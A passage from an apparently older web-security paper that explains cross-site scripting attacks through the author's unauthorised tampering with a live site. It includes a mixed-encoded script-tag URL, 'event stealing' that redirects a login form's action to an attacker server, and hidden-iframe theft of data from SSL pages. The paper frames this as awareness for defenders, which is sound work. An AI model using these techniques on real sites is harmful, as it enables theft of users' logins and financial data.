My logit.pl script was a script that executed on the server. When it received a request it would just log the ip, useragent and referrer passed in the HTTP header to a database, and would then output a 302 Document Moved header which would automatically redirect the browser to an actual image file. Since every page on the site was served with the same template I knew the image I would be changing would always be the same, so I just redirected the url back to that image so they wouldn’t see even a broken image icon. I am so considerate.

Had I been the nosey sort, I could have collected some real data on the surfers, used the javascript to do whatever, and then appended it to the query string of the img url. Had the data been too long to be passed in on a query string, I could have used the javascript to dynamically write a hidden iframe to the parent document, written a simple form to the window, filled in the elements and then posted it off to the server side script. No need to try to script across domains or worry about domain security models.

Ok, changes made, script in place. I would give it about 20 seconds for data collection, not wanting to whack my hosted site or expose too many people, then I would change it back and be off to reap the rewards of my collected data. As I sat and contemplated, I decided there was no need to carry through to the end goal. I knew it would work and had proven all the steps to myself before.
Not quite content to just pack up and go, I changed my injection script in the jpg file to a simple

document.write('some simple text for articlename')

Making the changes and watching the ticker scroll my little inconspicuous message, and knowing that it was also scrolling away on 7k other machines across the net, was enough to give me the satisfaction of the moment. I then went back and changed the article name to the same text I had used in the script and no one was any the wiser.

As my moment of victory waned and with it my perma grin of the private joke, I went back to examining the site. For the sake of brevity (too late now, you say?) I am only going to include 2 more examples of XSS holes I found in this site, both of which demonstrate techniques and concepts it is good to be aware of.

The next hole I found was a login page. If you were on the site and tried to perform an action that required authentication as a user, it would redirect you from the page you requested to the login page, passing the referrer page in the querystring. Since this referrer page was always handled internally it was assumed it was always a safe value. Not so safe :) I could inject any script I wanted as its value in the querystring. This example is what I term event stealing.

First, to discuss briefly, is how you could entice users to the login page. Isn’t the URL going to have a long querystring on it or the obvious <script src=></script> blocks ? Do you recognize this as script blocks at a glance?

%3C%73%63%72%69%70%74%20%73%72%63%3D%62%6C%61%68%3E%3C%2F%73%63%72%69%70%74%3E

Of course a fully encoded section of url is suspicious. So how about mixed encoding, viewed in its natural habitat.

http://login.asp?lan=en%2021&count=100&exp=12&ref=%3Csc%72%69pt%20s%72c%3Db%6Cah%3E%3C%2Fsc%72%69p%74%3E

It doesn’t look so obvious now, the url isn’t overly long, and a lot of people just click anyway. If you can make the link text something similar they won’t even think twice.
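For anyone reviewing logs or suspicious links, it helps to see what those two encoded strings actually say. Below is a minimal sketch that percent-decodes them; the helper queryParam is a hypothetical name, and the parsing is deliberately simple (split on ? and &), not a full URL parser.

```javascript
// The fully encoded string and the mixed-encoding URL, copied from the text above.
const fullyEncoded =
  '%3C%73%63%72%69%70%74%20%73%72%63%3D%62%6C%61%68%3E%3C%2F%73%63%72%69%70%74%3E';
const mixedUrl =
  'http://login.asp?lan=en%2021&count=100&exp=12&ref=%3Csc%72%69pt%20s%72c%3Db%6Cah%3E%3C%2Fsc%72%69p%74%3E';

// Hypothetical helper: return the decoded value of one querystring
// parameter, or null when the parameter is not present.
function queryParam(url, name) {
  const query = url.substring(url.indexOf('?') + 1);
  for (const pair of query.split('&')) {
    const eq = pair.indexOf('=');
    if (pair.substring(0, eq) === name) {
      return decodeURIComponent(pair.substring(eq + 1));
    }
  }
  return null;
}

console.log(decodeURIComponent(fullyEncoded)); // <script src=blah></script>
console.log(queryParam(mixedUrl, 'ref'));      // <script src=blah></script>
```

Both forms decode to the same script block, so any check has to look at the decoded value, never at the raw url.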
Anyway I digress, let's not worry about user tricking and just assume they are there. Event stealing is when you replace an event they have set up in a page with your own commands. For the example of a login page, sure you can inject a script, but the page contains no data until they fill it in. So you have to wait. You could use a timer or some bogus logic, but the best way to know when to snag the data is to steal the event of form submission. Actually you could steal the submit button press, which could fail because of validation routines, or you could just steal the onsubmit event of the form or even the unload event of the page. If you were to choose the onunload event of the page, you would be kinda stuck. The page is closing, you don’t have time to change an img src, and you would be forced to open up a new pop up window. This is way too obvious. This leaves us with two approaches, either

document.forms(0).onsubmit = ourfunction

or you can just steal the whole form submission and make it submit to your own server side script

document.forms(0).action ="http://myserver/myscript.asp"

then redirect them back to the proper script, and hopefully they won’t notice.

The last example we will dive into is an SSL encrypted page. SSL and high encryption just seem to make developers and surfers feel so warm and fuzzy inside. Haha you can’t get meeeee. *cough*cough* This is a bit of a myth. Sure the data transfers are sound, but if an SSL encrypted page has a cross-site scripting hole, all of that transport layer security is blown right out of the water!

Same site, different page. We are in an account management page. It is SSL encrypted because it contains information on credit accounts and payment options. Since it is SSL, the developer felt safe including plaintext username and password information in the form. The problem is that the server script took a querystring argument from a previous page and echoed it directly to the page source with no filtering.
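To make "echoed it directly to the page source with no filtering" concrete, here is a small sketch of the flaw next to an escaped echo for contrast. Everything in it is an assumption for illustration: the hidden ref field, the function names and the probe value are invented, since the paper does not show the real page's markup.

```javascript
// Hypothetical stand-in for the vulnerable server script: the querystring
// value is concatenated straight into the page source.
function renderUnfiltered(value) {
  return '<input type="hidden" name="ref" value="' + value + '">';
}

// Contrast case: HTML-escape the value before echoing it.
function escapeHtml(text) {
  return String(text)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

function renderEscaped(value) {
  return '<input type="hidden" name="ref" value="' + escapeHtml(value) + '">';
}

// Made-up probe: closes the attribute and the tag, then adds a script block.
const probe = '"><script src="images/778237.jpg"></script>';

console.log(renderUnfiltered(probe)); // the script tag survives as live markup
console.log(renderEscaped(probe));    // the same text arrives as inert character data
```

The page being served over SSL changes nothing in either output, which is the point of the example that follows.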
Again we have a 45 character input limit. Now because the page is SSL encrypted, even if we could slip in a script src= pointing to our server, the browser would complain that the page contains insecure items. We don’t want this. We want the surfer to feel warm and fuzzy and we want to hide in our dark alcoves. The answer to this conundrum is again a script file embedded on the server somehow. Again the author image upload to the rescue! Yay author image!

Anyway, glee aside: same trick to execute script, same content length bypass, same tricks to steal data from the page (this time juicy data though). The only difference is that SSL was there...and it didn’t stop us one bit. Since the script was coming from the same server, no security flag was raised and the script was assumed to be secure. How does that saying go? Bingo was his namo ?

The last trick I want to bring up is the idea of leveraging XSS attacks. In the above example I had an active attack that could lead to financial information. Since it was an attack where a user had to click on a link or perform some other action to request the page with the crafted url, there is a chance of being caught in our evil attempts. That is no fun. So now we ask ourselves, how can we force the user to perform those actions so they don’t realize it is happening?

There is a simple answer to this and it is termed XSS Leveraging. Let's indulge some thought and combine some of the holes we have found on this site. I can inject scripts that get stored in the database and output to unsuspecting users. So I can force users into any action I want. Now let's assume that the cookies didn’t contain all the login information and we couldn’t just steal accounts that way. Let's assume we can just tell from the cookie if they are logged in or not.
So, we embed our script src (another nice thing about using a script src to embed the script commands from a local server is that you know exactly who got hit, you can change the script at any time, and you don’t have to alter the database to change the code or turn it off). Our next step is to create a simple script. First look at the cookie; if the user is logged in then we write an iframe to the document with style attributes to either set it to hidden or to position it off screen. We then navigate this iframe to the crafted url. As the page navigates, IE may pop up its "some items on this page are secure" or whatever dialogue, but people generally feel safer with ssl so they probably would click ok. Also there are a lot of instances where a regular http:// request for a page that was meant to be only displayed over ssl will work. Again I digress..

So let's say we have our iframe loaded with the prize. Now it is a simple matter of grabbing the form elements we want and then submitting the data to our server. Since all of our script is executing from the same domain we do not have any problems with the cross domain security model, and the prize is ours.

######################################################################
4 Conclusion.
______________________________________________________________________

By now I hope you all understand that cross-site scripting is not as trivial a 'security' hole as it appears on the surface, or as the simple demos people post as examples make it seem. Identifying cross-site scripting is the easy part. Foreseeing its possibilities and knowing how to use it to impact a user base is the hard part, and is the part that is not widely discussed. With XSS so widely written about and so misunderstood, a lot of people have walked away with the false conclusion that it is an annoyance and not a threat.
The purpose of this paper is not to arm a horde of script kiddies with a bunch of proven tricks, but to try to instill a sense of its actual dangers and impacts in those who are in a position to do something about it. As with all knowledge, it can be a double-edged sword. As rfp's paper on SQL injection techniques brought out the dangers of SQL injection to the public, I too hope that this paper may have a similar effect, raising awareness and helping people to limit their own (and their surfer populations') exposure.

You may not lose your server to XSS attacks, it may not DOS your network, but you may lose your users, and you may be the reason your clients lost their credit card numbers, fell victim to identity theft or had their accounts tampered with.

Like this paper? Want to read more? Check out the site for more Web Application Security related papers and specialized Web App auditing tools.

http://sandsprite.com/Sleuth